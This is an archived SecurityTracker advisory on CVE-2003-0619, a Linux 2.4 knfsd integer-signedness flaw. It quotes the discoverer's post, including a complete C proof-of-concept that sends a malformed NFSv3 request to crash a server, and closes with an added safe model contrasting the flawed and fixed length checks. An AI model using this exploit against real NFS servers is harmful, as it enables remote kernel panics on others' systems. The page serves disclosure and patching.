SecurityTracker.com
SecurityTracker Archives

Category: OS (Linux) > Linux Kernel
Vendors: kernel.org
Linux 2.4 Kernel NFSv3 Integer Overflow May Let Remote Users Cause a Kernel Panic
SecurityTracker Alert ID:  1007331
SecurityTracker URL:  http://securitytracker.com/id/1007331
CVE Reference:   CVE-2003-0619   (Links to External Site)
Updated:  Apr 26 2004
Original Entry Date:  Jul 29 2003
Impact:   Denial of service via local system, Denial of service via network
Fix Available: Yes
Exploit Included: Yes
Version(s): prior to 2.4.21
Description:   A signed/unsigned length-handling error was reported in the XDR decoding of the Linux kernel's NFSv3 server (knfsd). A remote user who can reach the NFS service may be able to cause the system to crash. Only systems running the in-kernel NFS server with NFSv3 enabled are affected.

It is reported that the decode_fh() function in 'fs/nfsd/nfs3xdr.c' reads the file-handle length from attacker-supplied XDR data into a signed int and checks only that it does not exceed NFS3_FHSIZE. A negative length passes that check and is then passed to the kernel's memcpy(), where it is converted to a very large unsigned size; the resulting out-of-bounds copy triggers a kernel panic, according to the report.

Demonstration exploit code (knfsd_dos.c) is included with the Source Message below.

Impact:   A remote or local user may be able to cause denial of service conditions on the system.
Solution:   According to the report, this flaw was fixed in kernel version 2.4.21; the fix is to treat the decoded length as unsigned (or reject negative values) before the bounds check.
Vendor URL:  www.kernel.org/ (Links to External Site)
Cause:   Boundary error

Message History:   This archive entry has one or more follow-up message(s) listed below.
Dec 5 2003 (Conectiva Issues Fix for Conectiva 8) Linux 2.4 Kernel NFSv3 Integer Overflow May Let Remote Users Cause a Kernel Panic
Conectiva added a fix for Conectiva 8.



 Source Message Contents

Subject:  Remote Linux Kernel < 2.4.21 DoS in XDR routine.


Hello all,

I have discovered a signed/unsigned issue in a routine responsible for
demarshalling XDR data for NFSv3 procedure calls. As far as I can tell,
this bug has existed since NFSv3 support was integrated. It has been
silently fixed in 2.4.21.

The bug is in the decode_fh routine of fs/nfsd/nfs3xdr.c under the kernel
source tree.

Vulnerable code:

static inline u32 *
decode_fh(u32 *p, struct svc_fh *fhp)
{
        int size;
        fh_init(fhp, NFS3_FHSIZE);
        size = ntohl(*p++);
        if (size > NFS3_FHSIZE)
                return NULL;

        memcpy(&fhp->fh_handle.fh_base, p, size);
        fhp->fh_handle.fh_size = size;
        return p + XDR_QUADLEN(size);
}

Where p is a packet of attacker controlled XDR data. If size is made to be
negative, the sanity check is passed and the malicious value is passed to
memcpy. Due to the behavior of the kernel's memcpy, this will cause a very
large copy in kernel space, resulting in an instant kernel panic.

The attached code is a POC of this vulnerability. It requires that the
vulnerable host has an exported directory available to the attacker. This
is probably not the only way to manifest this bug, however.

If you have any questions, please feel free to contact me.

Cheers,

Jared Stanbrough <jareds@pdx.edu>

Attachment: knfsd_dos.c (decoded from the Base64 MIME part; a missing exit on
clnt_create() failure and the stdio/stdlib includes have been added, and the
code is otherwise as posted)

/*
  Linux 2.4.x knfsd kernel signed/unsigned decode_fh DoS
  Author: jared stanbrough <jareds@pdx.edu>
  Date: 07/19/2003

  Vulnerable code: (fs/nfsd/nfs3xdr.c line 52-64)

  static inline u32 *
  decode_fh(u32 *p, struct svc_fh *fhp)
  {
        int size;
        fh_init(fhp, NFS3_FHSIZE);
        size = ntohl(*p++);
        if (size > NFS3_FHSIZE)
                return NULL;

        memcpy(&fhp->fh_handle.fh_base, p, size);
        fhp->fh_handle.fh_size = size;
        return p + XDR_QUADLEN(size);
  }

  This code is called by quite a few XDR decoding routines. The below
  POC demonstrates the vulnerability by encoding a malicious fhsize
  at the beginning of a diroparg xdr argument.

  To test this, the vulnerable host must have an accessible exported
  directory which was previously mounted by the attacker. _HOWEVER_
  it may be possible to trigger this bug by some other method.

  Fix: Simply change size to an unsigned int, or check for size < 0.
*/

#include <stdio.h>
#include <stdlib.h>
#include <rpcsvc/nfs_prot.h>
#include <rpc/rpc.h>
#include <rpc/xdr.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>

#define NFSPROG 100003
#define NFSVERS 3
#define NFSPROC_GETATTR 1

static struct diropargs heh;

/* Argument encoder: instead of marshalling a real diropargs, emit a single
   XDR word of -1 (0xffffffff) where the server expects the file-handle
   length.  decode_fh() reads it into a signed int, so it passes the
   "size > NFS3_FHSIZE" check and reaches memcpy() as a huge length. */
bool_t xdr_heh(XDR *xdrs, diropargs *args)
{
  int32_t werd = -1;
  (void)args;
  return xdr_int32_t(xdrs, &werd);
}

int main(void)
{
  CLIENT * client;
  struct timeval tv;

  /* "marduk" is the author's test target; substitute the NFS server under test. */
  client = clnt_create("marduk", NFSPROG, NFSVERS, "udp");

  if(client == NULL) {
      clnt_pcreateerror("clnt_create");
      exit(1);
  }

  tv.tv_sec = 3;
  tv.tv_usec = 0;
  client->cl_auth = authunix_create_default();

  /* Send NFSv3 GETATTR with the malformed argument; a vulnerable server
     panics while decoding, so no reply is expected. */
  clnt_call(client, NFSPROC_GETATTR, (xdrproc_t) xdr_heh, (char *)&heh,
            (xdrproc_t) xdr_void, NULL, tv);

  return 0;
}
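The following is an added example, not part of the advisory or of the author's PoC: a user-space model of the decode_fh() length check, with the 2.4.20-style signed version beside a fixed unsigned version, run over a constructed XDR buffer whose leading file-handle length word is -1 (the value the PoC's xdr_heh() encodes), plus a benign and an over-long length for comparison. The function names decode_fh_vulnerable, decode_fh_fixed and build_xdr, and the fh_model struct, are this example's own; NFS3_FHSIZE = 64 and the wire layout (a 4-byte big-endian length followed by the handle bytes) follow the kernel code quoted above. The model records the length memcpy() would have been given and skips the copy when it is out of bounds, so it cannot crash; in the real kernel the copy of roughly 4 GB into a 64-byte handle buffer faults long before it completes, which is the reported panic.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <arpa/inet.h>

#define NFS3_FHSIZE 64   /* maximum NFSv3 file-handle length, as in the kernel */

/* Example stand-in for the kernel's svc_fh/knfsd_fh (not the kernel struct). */
struct fh_model {
    size_t copy_len;                 /* length memcpy() would be asked for  */
    unsigned int size;
    unsigned char base[NFS3_FHSIZE];
};

/* Mirrors the pre-2.4.21 logic: 'size' is a signed int and only the upper
 * bound is checked, so a negative length word passes.  Returns 1 when the
 * check passed, 0 when rejected.  The "copy_len <= NFS3_FHSIZE" guard is the
 * model's own safety net; the kernel had no such guard and called memcpy(). */
int decode_fh_vulnerable(const uint32_t *p, struct fh_model *fh)
{
    int size = (int)ntohl(*p++);
    if (size > NFS3_FHSIZE)
        return 0;
    fh->copy_len = (size_t)size;     /* implicit int -> size_t: -1 becomes SIZE_MAX */
    if (fh->copy_len <= NFS3_FHSIZE)
        memcpy(fh->base, p, fh->copy_len);
    fh->size = (unsigned int)size;
    return 1;
}

/* Fixed form: decode the length as unsigned, so 0xffffffff fails the same
 * upper-bound comparison.  Keeping int and adding "size < 0" (the other fix
 * the PoC comment suggests) is equivalent. */
int decode_fh_fixed(const uint32_t *p, struct fh_model *fh)
{
    unsigned int size = ntohl(*p++);
    if (size > NFS3_FHSIZE)
        return 0;
    fh->copy_len = size;
    memcpy(fh->base, p, size);
    fh->size = size;
    return 1;
}

/* Constructed request fragment: length word followed by filler handle bytes,
 * all in XDR big-endian order. */
size_t build_xdr(uint32_t *buf, int32_t fh_len, size_t nwords)
{
    buf[0] = htonl((uint32_t)fh_len);
    for (size_t i = 1; i < nwords; i++)
        buf[i] = htonl(0x41414141u);
    return nwords;
}

int main(void)
{
    uint32_t xdr_buf[1 + NFS3_FHSIZE / 4];   /* length word + 64 handle bytes */
    size_t nwords = sizeof xdr_buf / sizeof xdr_buf[0];
    struct fh_model fh;
    int32_t lengths[] = { 32, 65, -1 };      /* benign, too long, the PoC's value */

    for (size_t i = 0; i < sizeof lengths / sizeof lengths[0]; i++) {
        build_xdr(xdr_buf, lengths[i], nwords);
        memset(&fh, 0, sizeof fh);
        int v = decode_fh_vulnerable(xdr_buf, &fh);
        size_t vlen = fh.copy_len;
        memset(&fh, 0, sizeof fh);
        int f = decode_fh_fixed(xdr_buf, &fh);
        printf("length word %11d: vulnerable check %s (memcpy length %zu), fixed check %s\n",
               (int)lengths[i], v ? "PASSED" : "rejected", vlen,
               f ? "PASSED" : "rejected");
    }
    return 0;
}
```

Build with `cc -std=c99 -Wall decode_fh_model.c` (any file name). The -1 row is the whole bug: the signed comparison accepts it and the length handed to memcpy() becomes SIZE_MAX, while the unsigned version rejects it with the very same comparison.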

 
 


Copyright 2022, SecurityGlobal.net LLC